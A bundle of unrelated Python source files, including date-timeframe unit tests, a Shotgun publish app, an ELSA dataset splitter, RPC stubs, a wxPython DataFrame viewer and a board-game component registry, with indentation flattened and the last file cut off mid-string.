self.assertRaises(ValueError, Timeframe, start=start_date, length=3, step=1, by='x')
self.assertRaises(AssertionError, Timeframe, start=None, end=end_date, length=0)
self.assertRaises(AssertionError, Timeframe, start=None, end=end_date, length=3, step=.5)
self.assertRaises(ValueError, Timeframe, start=None, end=end_date, length=3, step=1, by='x')
def test_outputs(self):
# By day, length = 1
tf_00 = Timeframe(start=start_date, length=1, by='day')
self.assertIsInstance(tf_00.knots_info, pd.DataFrame)
self.assertEqual(tf_00.knots_info.shape[0], 1)
#self.assertEqual(tf_00.knots_info.shape[1], 2)#TODO three columns if we add tag
self.assertEqual(tf_00.start, tf_00.end)
tf_01 = Timeframe(start=None, end=end_date, length=1, by='day')
self.assertIsInstance(tf_01.knots_info, pd.DataFrame)
self.assertEqual(tf_01.knots_info.shape[0], 1)
#self.assertEqual(tf_01.knots_info.shape[1], 2)
self.assertEqual(tf_01.start, tf_01.end)
# By day, length = 2
tf_1 = Timeframe(start=start_date, length=2, by='day')
self.assertIsInstance(tf_1.knots_info, pd.DataFrame)
self.assertEqual(tf_1.knots_info.shape[0], 2)
#self.assertEqual(tf_1.knots_info.shape[1], 2)
self.assertEqual((tf_1.end - tf_1.start).days, 1)
# By day, length = 1, step = 2
tf_2 = Timeframe(start=start_date, length=1, step=2, by='day')
self.assertIsInstance(tf_2.knots_info, pd.DataFrame)
self.assertEqual(tf_2.knots_info.shape[0], 1)
#self.assertEqual(tf_2.knots_info.shape[1], 2)
self.assertEqual((tf_2.end - tf_2.start).days, 1)
# By month
tf_30 = Timeframe(start=start_date, length=3, step=1, by='month')
self.assertEqual(tf_30.knots_info.knot[0], 0)
self.assertEqual(tf_30.knots_info.knot[2], 2)
self.assertEqual(tf_30.knots_info.shape[0], 3)
self.assertEqual(tf_30.knots_info.init_date[1], pd.to_datetime('2000-07-15'))
self.assertEqual(tf_30.end, pd.to_datetime('2000-09-14'))
tf_31 = Timeframe(start=None, end=end_date, length=3, step=1, by='month')
self.assertEqual(tf_31.knots_info.knot[0], 0)
self.assertEqual(tf_31.knots_info.knot[2], 2)
self.assertEqual(tf_31.knots_info.shape[0], 3)
# By year, step = 2
tf_4 = Timeframe(start=start_date, length=5, step=2, by='year')
self.assertIsInstance(tf_4.knots_info, pd.DataFrame)
self.assertEqual(tf_4.knots_info.shape[0], 5)
self.assertEqual(tf_4.knots_info.init_date[3], pd.to_datetime('2006-06-15'))
self.assertEqual(tf_4.end, pd.to_datetime('2010-06-14'))
# By year, step = 2, start and end non None
tf_5 = Timeframe(start=start_date, length=5, step=2, by='year', end=end_date)
self.assertIsInstance(tf_5.knots_info, pd.DataFrame)
self.assertEqual(tf_5.knots_info.shape[0], 5)
self.assertEqual(tf_5.knots_info.init_date[3], pd.to_datetime('2006-06-15'))
self.assertEqual(tf_5.end, pd.to_datetime('2010-06-14'))
# By year, step = 2, start = None
tf_6 = Timeframe(start=None, length=5, step=2, by='year', end=end_date)
self.assertIsInstance(tf_6.knots_info, pd.DataFrame)
self.assertEqual(tf_6.knots_info.shape[0], 5)
self.assertEqual(tf_6.knots_info.init_date[3], pd.to_datetime('2006-06-21'))
self.assertEqual(tf_6.start, pd.to_datetime('2000-06-21'))
self.assertEqual(tf_6.end, pd.to_datetime(end_date))
def test_which_knots(self):
tf_6 = Timeframe(start=start_date, length=10, step=7, by='day')
dates = np.array(['2000-06-22', '2000-07-12', '2000-01-01', '2002-12-31', '2000-08-23', '2000-08-24'])
ix = tf_6.which_knot(dates)
self.assertEqual(ix.size, dates.size)
self.assertIsInstance(ix, np.ndarray)
self.assertEqual(ix[0], 1)
self.assertEqual(ix[1], 3)
self.assertEqual(ix[2], -1)
self.assertEqual(ix[3], -1)
self.assertEqual(ix[4], 9)
self.assertEqual(ix[5], -1)
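# Run the tests when this module is executed directly.
if __name__ == '__main__':
    unittest.main()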
|
# Copyright (c) 2015 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
"""
Multi Publish
"""
import os
import tank
from tank import TankError
class MultiPublish(tank.platform.Application):
def init_app(self):
"""
Called as the application is being initialized
"""
tk_multi_publish = self.import_module("tk_multi_publish")
self._publish_handler = tk_multi_publish.PublishHandler(self)
# register commands:
display_name = self.get_setting("display_name")
# "Publish Render" ---> publish_render
command_name = display_name.lower().replace(" ", "_")
if command_name.endswith("..."):
command_name = command_name[:-3]
params = {
"short_name": command_name,
"title": "%s..." % display_name,
"description": "Publishing of data into Shotgun",
# dark themed icon for engines that recognize this format
"icons": {
"dark": {
"png": os.path.join(
os.path.dirname(__file__),
"resources",
"publish_menu_icon.png"
)
}
}
}
self.engine.register_command("%s..." % display_name,
self._publish_handler.show_publish_dlg,
params)
@property
def context_change_allowed(self):
"""
Specifies that context changes are allowed.
"""
return True
def destroy_app(self):
self.log_debug("Destroying tk-multi-publish")
def copy_file(self, source_path, target_path, task):
"""
Utility method to copy a file from source_path to
target_path. Uses the copy file hook specified in
the configuration
"""
self.execute_hook("hook_copy_file",
source_path=source_path,
target_path=target_path,
task=task)
def post_context_change(self, old_context, new_context):
"""
Runs after a context change has completed.
:param old_context: The sgtk.context.Context being switched from.
:param new_context: The sgtk.context.Context being switched to.
"""
self._publish_handler.rebuild_primary_output()
|
import numpy as np
import pandas as pd
import argparse
from numpy.random import RandomState
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.utils import resample
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type=str, default = 'elsa')
args = parser.parse_args()
"""
Creates train, validation, and test sets
"""
def create_cv():
def create_data(index, full_data, deficits_val, medications_val, background_val, train = False, mean_deficits = 0, std_deficits = 0):
chosen = X[index, 0]
random_ids = dict(zip(chosen, np.random.rand(len(chosen))))
data = full_data.loc[full_data['id'].isin(chosen),['id', 'wave', 'age'] + deficits_val +
medications_val + background_val + ['death age']]
data['new ID'] = data.apply(lambda row: random_ids[int(row['id'])], axis = 1)
data = data.sort_values(by = ['new ID','wave'])
# scaling
if train:
            mean_deficits = pd.Series(index = deficits_val+['height', 'bmi', 'alcohol'], dtype = float)
            std_deficits = pd.Series(index = deficits_val+['height', 'bmi', 'alcohol'], dtype = float)
for d in deficits_val+['height', 'bmi', 'alcohol']:
mean_deficits[d] = data.loc[data[d]>-100,d].mean()
std_deficits[d] = data.loc[data[d]>-100,d].std()
else:
for d in deficits_val+['height', 'bmi', 'alcohol']:
data[d] = data[d].apply(lambda x: (x - mean_deficits[d])/std_deficits[d] if x > -100 else x)
data = data[['id', 'wave', 'age'] + deficits_val + medications_val + background_val + ['death age'] ]#.values
indexes = []
index_count = -1
previous_index = -100000
for i in range(len(data)):
index = data.iloc[i,0]
if(index != previous_index):
index_count += 1
data.iloc[i,0] = index_count
previous_index = index
if train:
return data, mean_deficits, std_deficits
else:
return data
ran_state = RandomState(2)
deficits = ['gait speed', 'grip dom', 'grip ndom', 'FI ADL', 'FI IADL', 'chair','leg raise', 'full tandem', 'srh', 'eye',
'hear', 'func',
'dias', 'sys', 'pulse', 'trig','crp','hdl','ldl','glucose','igf1','hgb','fib','fer', 'chol', 'wbc', 'mch', 'hba1c', 'vitd']
medications = ['BP med', 'anticoagulent med', 'chol med', 'hip/knee treat', 'lung/asthma med']
background = ['longill', 'limitact', 'effort', 'smkevr', 'smknow','height', 'bmi', 'mobility', 'country',
'alcohol', 'jointrep', 'fractures', 'sex', 'ethnicity']
if args.dataset == 'elsa':
data = pd.read_csv('../Data/ELSA_cleaned.csv')
postfix = ''
print('Splitting ELSA dataset')
elif args.dataset == 'sample':
data = pd.read_csv('../Data/sample_data.csv')
postfix = '_sample'
print('Splitting sample dataset')
else:
print('unknown dataset')
return 0
unique_indexes = data['id'].unique()
data['censored'] = data['death age'].apply(lambda x: 0 if x > 0 else 1)
censored = []
for id in unique_indexes:
censored.append(data.loc[data['id'] == id, 'censored'].unique()[0])
X = np.array([unique_indexes, censored], int).T
from sklearn.model_selection import StratifiedKFold
skf_outer = StratifiedKFold(n_splits=5, shuffle = True, random_state = 2)
skf_inner = StratifiedKFold(n_splits=5, shuffle = True, random_state = 3)
for i, (full_train_index, test_index) in enumerate(skf_outer.split(X[:,0], X[:,1])):
_, mean_deficits, std_deficits = create_data(np.arange(0,len(X[full_train_index,0]),dtype=int), data, deficits, medications, background, train=True)
mean_deficits.to_csv('../Data/mean_deficits%s.txt'%postfix)
std_deficits.to_csv('../Data/std_deficits%s.txt'%postfix)
for j, (train_index, valid_index) in enumerate(skf_inner.split(X[full_train_index,0], X[full_train_index,1])):
data_train = create_data(np.random.permutation(train_index), data, deficits, medications, background, mean_deficits = mean_deficits, std_deficits = std_deficits)
#data_train.to_csv('Data/train_outer%d_inner%d.csv'%(i,j), index=False)
data_train.to_csv('../Data/train%s.csv'%postfix, index=False)
data_valid = create_data(np.random.permutation(valid_index), data, deficits, medications, background, mean_deficits = mean_deficits, std_deficits = std_deficits)
#data_valid.to_csv('Data/valid_outer%d_inner%d.csv'%(i,j), index=False)
data_valid.to_csv('../Data/valid%s.csv'%postfix, index=False)
            break # don't do full cv
data_test = create_data(np.random.permutation(test_index), data, deficits, medications, background, mean_deficits = mean_deficits, std_deficits = std_deficits)
#np.savetxt('Data/test_outer%d.txt'%i,data_test,fmt=s)
data_test.to_csv('../Data/test%s.csv'%postfix,index=False)
        break # don't do full cv
if __name__ =="__main__":
create_cv()
|
from typing import Awaitable, Generic, List, Optional, TypeVar, Union
from .data import RpcMethod as RpcMethodDecl
from .data import Subscription as SubscriptionDecl
from .data import Deserializer, Serializer, ServiceMethod
EventPayload = TypeVar('EventPayload')
RpcReqPayload = TypeVar('RpcReqPayload')
RpcRespPayload = TypeVar('RpcRespPayload')
class Stub:
service = ''
def __init__(self, sif) -> None:
self.sif = sif
class Rpc(Generic[RpcReqPayload, RpcRespPayload]):
def __init__(
self,
stub: Stub,
method: str,
transport: Union[str, List[str]],
req_serializer: Optional[Serializer]=None,
req_deserializer: Optional[Deserializer]=None,
resp_serializer: Optional[Serializer]=None,
resp_deserializer: Optional[Deserializer]=None,
) -> None:
self.stub = stub
self.sif = stub.sif
self.service = stub.service
self.method = method
self.transport = transport
self.decl = RpcMethodDecl(
self.service,
self.method,
self.transport,
req_serializer=req_serializer,
req_deserializer=req_deserializer,
resp_serializer=resp_serializer,
resp_deserializer=resp_deserializer,
)
self.sif.add_decl(self.decl)
def __call__(self, payload: RpcReqPayload) -> Awaitable[RpcRespPayload]:
return self.call(payload)
async def call(self, payload: RpcReqPayload) -> RpcRespPayload:
call = self.sif.create_rpc_call(
self.service,
self.method,
payload,
)
await self.sif.call(call)
return await call.fut
def listen(
self,
func: ServiceMethod[RpcReqPayload, RpcRespPayload],
) -> None:
self.sif.add_rpc_method(self.decl, func)
class Sub(Generic[EventPayload]):
def __init__(
self,
stub: Stub,
topic: str,
transport: Union[str, List[str]],
serializer: Optional[Serializer]=None,
deserializer: Optional[Deserializer]=None
) -> None:
self.stub = stub
self.sif = stub.sif
self.service = stub.service
self.topic = topic
self.transport = transport
self.decl = SubscriptionDecl(
self.service,
self.topic,
self.transport,
serializer=serializer,
deserializer=deserializer,
)
self.sif.add_decl(self.decl)
def __call__(self, payload: EventPayload) -> Awaitable[None]:
return self.call(payload)
async def call(self, payload: EventPayload) -> None:
event = self.sif.create_event(self.service, self.topic, payload)
await self.sif.push(event)
def listen(self, func: ServiceMethod[EventPayload, None]):
self.sif.add_subscriber(self.decl, func)
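# A minimal usage sketch (assumptions for illustration: a `sif` runtime object
# providing add_decl/create_rpc_call/call, an 'echo' service exposing a 'say'
# RPC over a 'tcp' transport; none of these are defined in this module):
#
#     class EchoStub(Stub):
#         service = 'echo'
#         def __init__(self, sif) -> None:
#             super().__init__(sif)
#             self.say = Rpc[str, str](self, 'say', 'tcp')
#
#     resp = await EchoStub(sif).say('hello')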
|
import os
from dotenv import load_dotenv
load_dotenv(override=True)
API_TOKEN = os.getenv("API_TOKEN")
ACCESS_ID = os.getenv("ACCESS_ID")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__title__ = 'DataViewer'
__author__ = 'Tanner S Eastmond'
__contact__ = 'https://github.com/tseastmond'
__license__ = 'MIT'
import pandas as pd
import wx
import wx.lib.mixins.listctrl as listmix
from _data import _data
from _pagetwo import _pagetwo
from _pagethree import _pagethree
###############################################################################
###############################################################################
###############################################################################
class DataViewer(wx.Frame):
'''
This class is a data viewer for Pandas DataFrames that allows the user
to view, filter, and calculate summary statistics for each column.
'''
###########################################################################
###########################################################################
def __init__(self, df, rows=100):
'''
This class is a data viewer for Pandas DataFrames that allows the user
to view, filter, and calculate summary statistics for each column.
Parameters
----------
df : Pandas DataFrame
The data to view.
rows : int
Number of rows to show simultaneously.
'''
        # Initialize the app.
        self.app = wx.App()
# Set up the actual frame.
wx.Frame.__init__(self, None, title='Pandas DataFrame Viewer')
# Make a panel and a notebook.
panel = wx.Panel(self)
notebook = wx.Notebook(panel)
# Set up the pages.
page1 = _data(notebook, df, rows)
page2 = _pagetwo(notebook)
page3 = _pagethree(notebook)
# Actually add the pages.
notebook.AddPage(page1,'Data')
notebook.AddPage(page2,'Page 2')
notebook.AddPage(page3,'Page 3')
# Size the notebook correctly.
sizer = wx.BoxSizer()
sizer.Add(notebook, 1, wx.EXPAND)
panel.SetSizer(sizer)
# Set a status bar.
self.CreateStatusBar(1)
self.SetStatusText('{0} Columns, {1} Rows'.format(len(df.columns), page1.list.GetItemCount()))
# Ensure the app closes when exit button is clicked.
closeBtn = wx.Button(panel, label="Close")
closeBtn.Bind(wx.EVT_BUTTON, self.onClose)
# Show and loop.
self.Show()
self.app.MainLoop()
# Delete the app.
del self.app
###########################################################################
###########################################################################
def onClose(self, event):
self.Destroy()
###############################################################################
###############################################################################
###############################################################################
if __name__ == '__main__':
df = pd.read_csv(r'C:\Users\tanne\OneDrive\Python\san_diego_unified\principals\clean.csv', encoding='latin')
    DataViewer(df, rows=100)
|
# encoding: utf-8
from typing import List, Dict
import math
from collections import OrderedDict
import json
ATTRS_IN_ORDER = [
"name",
# display
"top",
"left",
"height",
"width",
"color",
"textColor",
"showImage",
"text",
"text_ja",
"textAlign",
"image",
"faceupImage",
"faceupText",
"faceupText_ja",
"facedownImage",
"facedownText",
"facedownText_ja",
"counterValue",
# behavior
"handArea",
"draggable",
"flippable",
"ownable",
"resizable",
"rollable",
"traylike",
"counter",
'boxOfComponents',
'cardistry',
'positionOfBoxContents',
'stowage',
"onAdd",
'toolboxFunction',
'editable',
# current status
"owner",
"faceup",
"zIndex",
]
def in_order(component):
result = OrderedDict()
keys = set(component.keys())
for k in ATTRS_IN_ORDER:
if k not in keys:
continue
result[k] = component[k]
keys.remove(k)
if len(keys) > 0:
raise ValueError(f"component contains unknown keys: {keys}")
return result
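# A minimal sketch of what in_order does (the component dict below is a
# hypothetical example, not one of the kit definitions in this file):
#     in_order({"left": "0px", "name": "Example Card", "top": "0px"})
#     # -> OrderedDict with keys ordered: name, top, left
#     in_order({"name": "X", "unknown": 1})  # raises ValueError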
class Box:
def __init__(self, kit: 'Kit', box_component: Dict = None):
self.kit: 'Kit' = kit
self.box_component: Dict = box_component
self.content_names: List[str] = []
def add_component(self, data, template=None):
self.kit.registry.add_component(data, template=template)
self.content_names.append(data['name'])
@property
def box_component(self):
return self._box_component
@box_component.setter
def box_component(self, box_component):
self._box_component = box_component
if box_component:
self.kit.registry.add_component(box_component)
def use_components(self, components):
for c in components:
if type(c) == str:
self.content_names.append(c)
else:
                raise ValueError(f"use_components accepts component names (str), got {type(c)}")
class Kit:
def __init__(self, registry: 'ComponentRegistry'):
self.registry: 'ComponentRegistry' = registry
self._description: Dict = {}
self.direct_component_names: List[str] = []
self.boxes: List[Box] = []
def box(self, box_component=None) -> Box:
box = Box(self, box_component)
self.boxes.append(box)
return box
def add_component(self, data, template=None):
self.registry.add_component(data, template=template)
self.direct_component_names.append(data['name'])
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
class ComponentRegistry:
def __init__(self):
self.components: List = []
self.kits: List[Kit] = []
def add_component(self, data, template=None):
if template:
completeData = template.copy()
completeData.update(data)
else:
completeData = data.copy()
for c in self.components:
if c['name'] == completeData['name']:
assert c == completeData
break
else:
self.components.append(in_order(completeData))
def kit(self) -> Kit:
kit = Kit(self)
self.kits.append(kit)
return kit
def build_data_for_deploy(self):
data_for_deploy = {}
data_for_deploy['components'] = [{'component': c} for c in self.components]
data_for_deploy['kits'] = []
for kit in self.kits:
kit_data = kit.description.copy()
used_component_names = set()
used_component_names.update(kit.direct_component_names)
kit_data['boxAndComponents'] = {}
for direct_component_name in kit.direct_component_names:
assert direct_component_name not in kit_data['boxAndComponents']
kit_data['boxAndComponents'][direct_component_name] = None
for box in kit.boxes:
box_name = box.box_component['name']
assert box_name not in kit_data['boxAndComponents'], f"kit_data {kit_data}"
kit_data['boxAndComponents'][box_name] = box.content_names
used_component_names.update([box_name] + box.content_names)
data_for_deploy['kits'].append({'kit': kit_data})
            kit_data['usedComponentNames'] = sorted(list(used_component_names))  # sorted to keep the test output stable
return data_for_deploy
def generate_toolbox(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Toolbox",
"label": "Toolbox",
"label_ja": "道具箱",
"width": "400px",
"height": "300px"
}
box = kit.box({
"name": "Toolbox",
"text": "Toolbox",
"text_ja": "道具箱",
"handArea": False,
"top": "0px",
"left": "0px",
"height": "300px",
"width": "460px",
"color": "darkgray",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": True,
"rollable": False,
"ownable": False,
"traylike": True,
"boxOfComponents": True,
"cardistry": ["collect"],
"zIndex": 1,
})
template = {
"height": "100px",
"width": "125px",
"draggable": True,
"flippable": False,
"ownable": False,
"resizable": True,
"color": "cyan",
"textColor": "black",
}
z_index = 100
offset = 0
card = {
"name": "Export Table",
"top": f"{int(offset / 3) * 110}px",
"left": f"{(offset % 3) * 135 + 60}px",
"text": "Export Table",
"toolboxFunction": "export table",
"zIndex": z_index,
}
box.add_component(card, template=template)
z_index -= 1
offset += 1
card = {
"name": "Upload Kit",
"top": f"{int(offset / 3) * 110}px",
"left": f"{(offset % 3) * 135 + 60}px",
"text": "Upload Kit",
"toolboxFunction": "upload kit",
"zIndex": z_index,
}
box.add_component(card, template=template)
z_index -= 1
offset += 1
def generate_note(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Note",
"label": "Note",
"label_ja": "メモ",
"width": "100px",
"height": "75"
}
kit.add_component({
"name": "Note",
"handArea": False,
"top": "0px",
"left": "0px",
"height": "75px",
"width": "100px",
"text": "(Double click to edit)",
"color": '#feff9c',
"textColor": 'black',
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": True,
"rollable": False,
"ownable": False,
"editable": True,
})
def generate_dice(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Dice (Blue)",
"label": "Dice (Blue)",
"label_ja": "サイコロ(青)",
"width": "64px",
"height": "64px"
}
kit.add_component({
"name": "Dice (Blue)",
"handArea": False,
"top": "0px",
"left": "0px",
"height": "64px",
"width": "64px",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": False,
"rollable": True,
"ownable": False,
"onAdd": "function(component) { \n"
" component.rollFinalValue = Math.floor(Math.random() * 6) + 1;\n"
" component.rollDuration = 500;\n"
" component.startRoll = true;\n"
"}"
})
def generate_playing_card(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Playing Card",
"label": "Playing Card",
"label_ja": "トランプ",
"width": "400px",
"height": "150px"
}
box = kit.box({
"name": "Playing Card Box",
"handArea": False,
"top": "0px",
"left": "0px",
"height": "200px",
"width": "250px",
"color": "blue",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": False,
"rollable": False,
"ownable": False,
"traylike": True,
"boxOfComponents": True,
"cardistry": ["spread out", "collect", "shuffle", 'flip all'],
"zIndex": 1,
})
template = {
"height": "100px",
"width": "75px",
"showImage": True,
"faceupImage": "/static/images/playing_card_up.png",
"facedownImage": "/static/images/playing_card_back.png",
"facedownText": "",
"faceup": False,
"draggable": True,
"flippable": True,
"ownable": True,
"resizable": False,
}
z_index = 100
offset = 0
for suit, prefix, color in [("♠", "S", "black"), ("♥", "H", "red"), ("♦", "D", "red"), ("♣", "C", "black")]:
for rank in ["A", "K", "Q", "J", "10", "9", "8", "7", "6", "5", "4", "3", "2"]:
card = {
"name": f"PlayingCard {prefix}_{rank}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"textColor": color,
"faceupText": f"{suit}{rank}",
"zIndex": z_index,
}
box.add_component(card, template=template)
z_index -= 1
offset += 1
for i in range(2):
card = {
"name": f"JOKER{i + 1}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"textColor": "black",
"faceupText": "JOKER",
"zIndex": z_index,
}
card.update(template)
box.add_component(card, template=template)
z_index -= 1
offset += 1
kit.add_component({
"name": "Stowage for Unused Cards",
"handArea": False,
"top": "0px",
"left": "300px",
"height": "150px",
"width": "150px",
"text": "Place cards you don't need now here",
"text_ja": "使わないカード置き場",
"color": "darkgrey",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": True,
"rollable": False,
"ownable": False,
"traylike": True,
"stowage": True,
"boxOfComponents": False,
"zIndex": 1,
})
def generate_psychological_safety_game(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Psychological Safety Game",
"label": "Psychological Safety Game",
"label_ja": "心理的安全性ゲーム",
"width": "550px",
"height": "750px"
}
template = {
"height": "120px",
"width": "83px",
"showImage": True,
"faceup": False,
"draggable": True,
"flippable": True,
"ownable": True,
"resizable": False,
}
z_index = 100
offset = 0
voice_card_box = kit.box()
for voice in range(35):
card = {
"name": f"PsychologicalSafety V{voice + 1:02}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"faceupImage": f"/static/images/psychological_safety_v{voice + 1:02}.jpg",
"facedownImage": "/static/images/psychological_safety_voice_back.png",
"zIndex": z_index,
}
voice_card_box.add_component(card, template=template)
z_index -= 1
offset += 1
offset = 0
situation_card_box = kit.box()
for situation in range(14):
card = {
"name": f"PsychologicalSafety S{situation + 1:02}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"faceupImage": f"/static/images/psychological_safety_s{situation + 1:02}.jpg",
"facedownImage": "/static/images/psychological_safety_situation_back.png",
"zIndex": z_index,
}
situation_card_box.add_component(card, template=template)
z_index -= 1
offset += 1
kit.add_component({
"name": "PsychologicalSafety Board",
"top": "0",
"left": "0",
"height": "500px",
"width": "354px",
"showImage": True,
"image": "/static/images/psychological_safety_board.png",
"draggable": True,
"flippable": False,
"ownable": False,
"resizable": True,
"traylike": True,
"zIndex": 0,
})
z_index -= 1
voice_card_box.box_component = {
"name": "PsychologicalSafety Box for Voice",
"handArea": False,
"top": "0px",
"left": "380px",
"height": "200px",
"width": "350px",
"color": "yellow",
"text": "Situation Cards",
"text_ja": "発言&オプションカード",
"textColor": "black",
"textAlign": "center bottom",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": False,
"rollable": False,
"ownable": False,
"traylike": True,
"boxOfComponents": True,
"cardistry": ['spread out', 'collect', 'shuffle', 'flip all'],
"zIndex": 0,
}
z_index -= 1
situation_card_box.box_component = {
"name": "PsychologicalSafety Box for Situation",
"handArea": False,
"top": "220px",
"left": "380",
"height": "150px",
"width": "350px",
"color": "green",
"text": "Situation Cards",
"text_ja": "状況カード",
"textColor": "black",
"textAlign": "center bottom",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": False,
"rollable": False,
"ownable": False,
"traylike": True,
"boxOfComponents": True,
"cardistry": ['spread out', 'collect', 'shuffle', 'flip all'],
"zIndex": 0,
}
z_index -= 1
kit.box({
"name": "PsychologicalSafety Box for Stones",
"handArea": False,
"top": "390px",
"left": "380px",
"height": "150px",
"width": "250px",
"color": "black",
"text": "Stones",
"text_ja": "石の置き場",
"textColor": "white",
"textAlign": "center bottom",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": False,
"rollable": False,
"ownable": False,
"traylike": False,
"boxOfComponents": True,
"cardistry": ['collect in mess'],
"positionOfBoxContents": "random",
"zIndex": 0,
}).use_components(
[f"Transparent Stone {stone + 1:02}" for stone in range(4)] * 8
)
z_index -= 1
def generate_coin(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Coin - Tetradrachm of Athens",
"label": "Coin",
"label_ja": "コイン",
"width": "100px",
"height": "100px"
}
kit.add_component({
"name": "Coin - Tetradrachm of Athens",
"top": "0px",
"left": "0px",
"height": "80px",
"width": "80px",
"faceupImage": "/static/images/coin_TetradrachmOfAthens_head.png",
"facedownImage": "/static/images/coin_TetradrachmOfAthens_tail.png",
"showImage": True,
"draggable": True,
"flippable": True,
"ownable": False,
"resizable": True,
})
def generate_counter(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Counter",
"label": "Counter",
"label_ja": "カウンター",
"width": "192px",
"height": "96px"
}
kit.add_component({
"name": "Counter",
"text": "Counter",
"text_ja": "カウンター",
"top": "0px",
"left": "0px",
"width": "192px",
"height": "96px",
"showImage": False,
"draggable": True,
"flippable": False,
"ownable": True,
"resizable": True,
"counter": True,
})
def generate_stones(reg: ComponentRegistry):
template = {
"height": "25px",
"width": "25px",
"showImage": True,
"faceup": False,
"draggable": True,
"flippable": False,
"ownable": True,
"resizable": False,
}
kit = reg.kit()
kit.description = {
"name": "Transparent Stones",
"label": "Transparent Stones",
"label_ja": "宝石(セット)",
"positionOfKitContents": "random",
"width": "100px",
"height": "100px"
}
offset = 0
for stone in range(4):
s = {
"name": f"Transparent Stone {stone + 1:02}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"image": f"/static/images/transparent_stone_{stone + 1:02}.png",
}
kit.add_component(s, template)
offset += 1
def generate_planning_poker(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Planning Poker",
"label": "Planning Poker",
"label_ja": "プランニングポーカー",
"positionOfKitContents": "on all hand areas",
"width": "400px",
"height": "150px"
}
template = {
"height": "40x",
"width": "30px",
"color": "bisque",
"textColor": "black",
"showImage": False,
"facedownText": "Planning Poker",
"faceup": True,
"draggable": True,
"flippable": True,
"ownable": True,
"resizable": False,
}
z_index = 100
offset = 0
for point in ["0", "1/2", "1", "2", "3", "5", "8", "13", "20", "40", "100", "∞", "?", "\u2615"]:
card = {
"name": f"PlanningPoker {point}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"faceupText": f"{point}",
"zIndex": z_index,
}
kit.add_component(card, template=template)
z_index -= 1
offset += 1
def generate_diamond_game(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Diamond Game",
"label": "Chinese Checker",
"label_ja": "ダイヤモンドゲーム",
"width": "638px",
"height": "553px"
}
kit.add_component({
"name": "Diamond Game Board",
"handArea": False,
"top": "0",
"left": "0",
"height": "638px",
"width": "553px",
"showImage": True,
"image": "/static/images/diamond_game_board.png",
"draggable": False,
"flippable": False,
"resizable": False,
"rollable": False,
"ownable": False,
"traylike": True,
"boxOfComponents": False,
"zIndex": 1,
})
template = {
"height": "38x",
"width": "27px",
"showImage": True,
"image": "/static/images/piece_A_red.png",
"draggable": True,
"flippable": False,
"ownable": False,
"resizable": False,
"zIndex": 2,
}
INTERVAL_W = 40
INTERVAL_H = math.sqrt(3) * (INTERVAL_W / 2)
for i in range(5):
for j in range(5 - i):
piece = {
"name": f"piece red{i}-{j}",
"top": f"{151 + i * INTERVAL_H}px",
"left": f"{22 + j * INTERVAL_W + (i * INTERVAL_W) / 2}px",
}
if i == j == 0:
piece["name"] = "piece red king"
piece["image"] = "/static/images/piece_A_red_king.png",
piece["height"] = "52px"
kit.add_component(piece, template)
template.update({
"image": "/static/images/piece_A_yellow.png",
})
for i in range(5):
for j in range(5 - i):
piece = {
"name": f"piece yellow{i}-{j}",
"top": f"{151 + i * INTERVAL_H}px",
"left": f"{342 + j * INTERVAL_W + (i * INTERVAL_W) / 2}px",
}
if i == 0 and j == 4:
piece["name"] = "piece yellow king"
piece["image"] = "/static/images/piece_A_yellow_king.png",
piece["height"] = "52px"
kit.add_component(piece, template)
template.update({
"image": "/static/images/piece_A_green.png",
})
for i in range(5):
for j in range(5 - i):
piece = {
"name": f"piece green{i}-{j}",
"top": f"{433 + i * INTERVAL_H}px",
"left": f"{181 + j * INTERVAL_W + (i * INTERVAL_W) / 2}px",
}
if i == 4:
piece["name"] = "piece green king"
piece["image"] = "/static/images/piece_A_green_king.png",
piece["height"] = "52px"
kit.add_component(piece, template)
def write_default_table_json():
table = OrderedDict(
components=OrderedDict(),
kits=[],
players=OrderedDict(),
tablename="dummy"
)
table["components"]["title"] = {
"name": "title",
"top": "20px",
"left": "20px",
"width": "300px",
"height": "40px",
"text": "Welcome to a new table!",
"text_ja": "新しいテーブルへようこそ!",
"color": "blue",
"draggable": True,
"flippable": False,
"ownable": False,
"resizable": True,
"showImage": False,
"zIndex": 1,
}
table["components"]["usage"] = {
"name": "usage",
"top": "20px",
"left": "340px",
"height": "250px",
"width": "400px",
"color": "darkgoldenrod",
"showImage": False,
"faceupText": "- Use Add / Remove Kits (to the left) have components on the table\n - Drag to move\n - Double click to flip\n - Drag the table to scroll\n - Share URL to invite people\n - Add Hand Area (to the left) to have your own cards (hand)\n - Cards in your hand won't be seen by others\n - Enjoy! but you might encounter some issues... Please let us know when you see one",
